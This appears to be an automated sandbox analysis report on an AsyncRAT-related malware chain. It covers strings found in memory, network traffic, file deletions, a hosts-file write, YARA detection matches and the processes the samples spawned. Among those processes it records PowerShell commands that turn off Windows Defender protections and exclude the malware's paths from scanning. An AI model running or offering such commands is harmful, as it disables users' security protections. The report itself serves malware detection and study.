                        Source: Built.exe, 00000003.00000003.1928360339.000001D5E626C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2054526869.000001D5E58B4000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1854557836.000001D5E5D10000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847371590.000001D5E5D08000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872057238.000001D5E5D08000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847371590.000001D5E5D10000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2054089602.000001D5E57E8000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872057238.000001D5E5D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                        Source: Built.exe, 00000003.00000003.1847333693.000001D5E551C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1848424250.000001D5E544C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1838072627.000001D5E54BA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847774640.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1832084743.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872409675.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E543A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: Built.exe, 00000003.00000003.1848424250.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872343443.000001D5E5498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                        Source: Built.exe, 00000003.00000003.1847774640.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1832084743.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E53E1000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872409675.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E543A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: Built.exe, 00000003.00000003.1848424250.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872343443.000001D5E5498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                        Source: Built.exe, 00000003.00000003.1847333693.000001D5E551C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1838072627.000001D5E54BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: Built.exe, 00000003.00000003.1848424250.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872343443.000001D5E5498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: Built.exe, 00000003.00000003.1847333693.000001D5E551C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1848424250.000001D5E544C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1848424250.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1838072627.000001D5E54BA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847774640.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1832084743.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E543A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872343443.000001D5E5498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: Built.exe, 00000003.00000003.1891900310.000001D5E5413000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1847774640.000001D5E5413000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1929245930.000001D5E5416000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1832084743.000001D5E5412000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872409675.000001D5E5416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
                        Source: Built.exe, 00000003.00000003.1829183709.000001D5E525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
                        Source: Built.exe, 00000003.00000003.1848424250.000001D5E5498000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1872343443.000001D5E5498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E5914000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E58B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
                        Source: Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2065120832.00007FFDF7568000.00000004.00000001.01000000.0000001A.sdmp, Built.exe, 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpString found in binary or memory: https://www.openssl.org/H
                        Source: Built.exe, 00000003.00000002.2041700632.000001D5E47E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                        Source: Built.exe, Built.exe, 00000003.00000002.2066532868.00007FFDFB6D8000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: https://www.python.org/psf/license/
                        Source: Built.exe, 00000003.00000003.1856705420.000001D5E5360000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.2032955728.000001D5E5341000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1829183709.000001D5E5360000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1884484741.000001D5E5360000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FA8000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2047540968.000001D5E5341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                        Source: Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E58B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                        Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4FCA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49732 version: TLS 1.2

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\VLZDGUKUTZ.docxJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\VLZDGUKUTZ.docxJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\UMMBDNEQBN.xlsxJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\KZWFNRXYKI.pngJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?\Common Files\Desktop\KZWFNRXYKI.pngJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                        Operating System Destruction

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: 01 00 00 00

                        System Summary

                        barindex
                        Source: Vjy8d2EoqK.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 4.0.S l r .exe.409294.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 4.3.S l r .exe.569e78.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 4.0.S l r .exe.409294.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 4.3.S l r .exe.569e78.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 6.0.XClient.exe.d70000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.3.Vjy8d2EoqK.exe.e8fa8c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 4.0.S l r .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.0.Vjy8d2EoqK.exe.adfe9c.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.0.Vjy8d2EoqK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.0.Vjy8d2EoqK.exe.40936c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000004.00000003.1709553123.000000000055D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000000.1682604318.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000006.00000000.1709097022.0000000000D72000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" "
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" "Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_0029718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,2_2_0029718C
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Windows\SysWOW64\it-IT\dasHost.exe
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Windows\SysWOW64\it-IT\21b1a557fd31cc
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Windows\addins\cmd.exe
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Windows\addins\ebf1f9fa8afd6d
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Windows\apppatch\en-US\conhost.exe
                        Source: C:\Brokercrt\comReviewsession.exeFile created: C:\Windows\apppatch\en-US\088424020bedd6
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5C10001_2_00007FF76D5C1000
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5E5C741_2_00007FF76D5E5C74
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5DFBD81_2_00007FF76D5DFBD8
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5D0E701_2_00007FF76D5D0E70
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5E4F101_2_00007FF76D5E4F10
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5DCD6C1_2_00007FF76D5DCD6C
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5C95FB1_2_00007FF76D5C95FB
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5DD8801_2_00007FF76D5DD880
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5D10741_2_00007FF76D5D1074
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5D50401_2_00007FF76D5D5040
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5D28C01_2_00007FF76D5D28C0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5E2F201_2_00007FF76D5E2F20
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5DFBD81_2_00007FF76D5DFBD8
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5D1F301_2_00007FF76D5D1F30
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5E57281_2_00007FF76D5E5728
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5C9FCD1_2_00007FF76D5C9FCD
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5C979B1_2_00007FF76D5C979B
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5D12801_2_00007FF76D5D1280
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5D0A601_2_00007FF76D5D0A60
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5E8A381_2_00007FF76D5E8A38
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5D7AAC1_2_00007FF76D5D7AAC
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5E518C1_2_00007FF76D5E518C
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5DD2001_2_00007FF76D5DD200
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5D91B01_2_00007FF76D5D91B0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5D14841_2_00007FF76D5D1484
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5D0C641_2_00007FF76D5D0C64
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5D2CC41_2_00007FF76D5D2CC4
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5E0B841_2_00007FF76D5E0B84
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5C8B201_2_00007FF76D5C8B20
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5D73F41_2_00007FF76D5D73F4
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5E33BC1_2_00007FF76D5E33BC
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_0029857B2_2_0029857B
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002BD00E2_2_002BD00E
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_0029407E2_2_0029407E
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002A70BF2_2_002A70BF
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002C11942_2_002C1194
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_0029E2A02_2_0029E2A0
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002932812_2_00293281
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002B02F62_2_002B02F6
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002A66462_2_002A6646
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002B473A2_2_002B473A
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002B070E2_2_002B070E
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002927E82_2_002927E8
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002A37C12_2_002A37C1
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_0029E8A02_2_0029E8A0
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_0029F9682_2_0029F968
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002B49692_2_002B4969
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002A3A3C2_2_002A3A3C
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002A6A7B2_2_002A6A7B
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002BCB602_2_002BCB60
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002B0B432_2_002B0B43
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002A5C772_2_002A5C77
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_0029ED142_2_0029ED14
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002A3D6D2_2_002A3D6D
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002AFDFA2_2_002AFDFA
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_0029BE132_2_0029BE13
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_0029DE6C2_2_0029DE6C
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_00295F3C2_2_00295F3C
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002B0F782_2_002B0F78
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5C10003_2_00007FF76D5C1000
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5E5C743_2_00007FF76D5E5C74
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5D0E703_2_00007FF76D5D0E70
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5E4F103_2_00007FF76D5E4F10
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5DCD6C3_2_00007FF76D5DCD6C
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5C95FB3_2_00007FF76D5C95FB
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5DD8803_2_00007FF76D5DD880
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5D10743_2_00007FF76D5D1074
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5D50403_2_00007FF76D5D5040
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5D28C03_2_00007FF76D5D28C0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5E2F203_2_00007FF76D5E2F20
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5DFBD83_2_00007FF76D5DFBD8
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5D1F303_2_00007FF76D5D1F30
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5E57283_2_00007FF76D5E5728
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5C9FCD3_2_00007FF76D5C9FCD
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5C979B3_2_00007FF76D5C979B
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5D12803_2_00007FF76D5D1280
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5D0A603_2_00007FF76D5D0A60
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5E8A383_2_00007FF76D5E8A38
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5D7AAC3_2_00007FF76D5D7AAC
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5E518C3_2_00007FF76D5E518C
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5DD2003_2_00007FF76D5DD200
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5D91B03_2_00007FF76D5D91B0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5D14843_2_00007FF76D5D1484
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5D0C643_2_00007FF76D5D0C64
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5D2CC43_2_00007FF76D5D2CC4
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5E0B843_2_00007FF76D5E0B84
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5C8B203_2_00007FF76D5C8B20
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5DFBD83_2_00007FF76D5DFBD8
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5D73F43_2_00007FF76D5D73F4
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5E33BC3_2_00007FF76D5E33BC
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF70318A03_2_00007FFDF70318A0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF715B3603_2_00007FFDF715B360
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF71517BE3_2_00007FFDF71517BE
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7151A8C3_2_00007FFDF7151A8C
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF716F6603_2_00007FFDF716F660
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF715115E3_2_00007FFDF715115E
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF71612F03_2_00007FFDF71612F0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF71515B43_2_00007FFDF71515B4
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7151BE03_2_00007FFDF7151BE0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF715199C3_2_00007FFDF715199C
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF71513983_2_00007FFDF7151398
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF715114F3_2_00007FFDF715114F
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF7201AA03_2_00007FFDF7201AA0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF715F9C53_2_00007FFDF715F9C5
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF71514513_2_00007FFDF7151451
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF71513F23_2_00007FFDF71513F2
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF72125F43_2_00007FFDF72125F4
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF72146383_2_00007FFDF7214638
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF721177B3_2_00007FFDF721177B
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FFDF722C6203_2_00007FFDF722C620
